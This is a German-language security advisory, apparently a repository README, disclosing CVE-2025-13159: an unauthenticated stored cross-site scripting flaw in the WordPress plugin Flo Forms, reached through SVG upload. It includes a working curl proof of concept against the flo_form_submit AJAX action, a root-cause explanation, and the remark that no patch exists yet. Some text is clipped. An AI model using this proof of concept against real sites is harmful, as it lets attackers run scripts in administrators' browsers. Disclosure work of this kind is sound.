
Offenlegung für CVE-2025-13159
Offenlegung für CVE-2025-13159
Dieses Repository legt eine Sicherheitslücke offen, die in Flo Forms – Easy Drag & Drop Form Builder <= 1.0.43, einem von flothemesplugins entwickelten WordPress-Plugin, entdeckt wurde.
| CVE-ID | Typ | Komponente | Auswirkung |
|---|
| CVE-2025-13159 | Nicht authentifiziertes gespeichertes Cross-Site Scripting via SVG-Upload | public/class-flo-forms-public.php | Nicht authentifizierte Angreifer können JS ausführen |
flo_form_submit ausnutzt, um über den SVG-Upload beliebige Skripte zu speichern.curl -k -X POST "https://localhost:8080/wp-admin/admin-ajax.php" \
-F 'action=flo_form_submit' \
-F 'flo_fid=<your fid>' \
-F 'flo-form-model={}' \
-F 'flo-form-schema={"groups":[]}' \
-F '[email protected];type=image/svg+xml'
※Wenn die fid innerhalb des Objekts nicht existiert, schlägt der Vorgang fehl.
Das Plugin erweitert die von WordPress erlaubten MIME-Typen um image/svg+xml und stellt eine nicht authentifizierte AJAX-Aktion (flo_form_submit) bereit, die Dateianhänge akzeptiert und sie ohne SVG-Bereinigung oder Berechtigungsprüfung an media_handle_upload() übergibt. Hochgeladene SVGs werden dann als image/svg+xml ausgeliefert und in der Admin-Oberfläche verlinkt. Wenn ein Administrator den Anhang öffnet (direkt oder über <object>/``), interpretiert der Browser das SVG-Dokument und führt eingebettete Skripte aus – dies führt zu gespeichertem XSS.
Ein Monat ist vergangen, aber es wurde noch kein Patch veröffentlicht und der Download selbst wurde gestoppt. Diesmal gelang die Reproduktion des PoC nicht auf Anhieb – ich hing über eine Stunde fest, bis sich herausstellte, dass ich vor XSS.svg das At-Zeichen (@) vergessen hatte.
Name: MooseLove
Rolle: Unabhängiger Sicherheitsforscher / Bug Hunter
Kontakt: Auf Anfrage erhältlich
Dieses Advisory wird zur öffentlichen Sicherheitsaufklärung bereitgestellt. Bei Weitergabe bitte die Quelle nennen.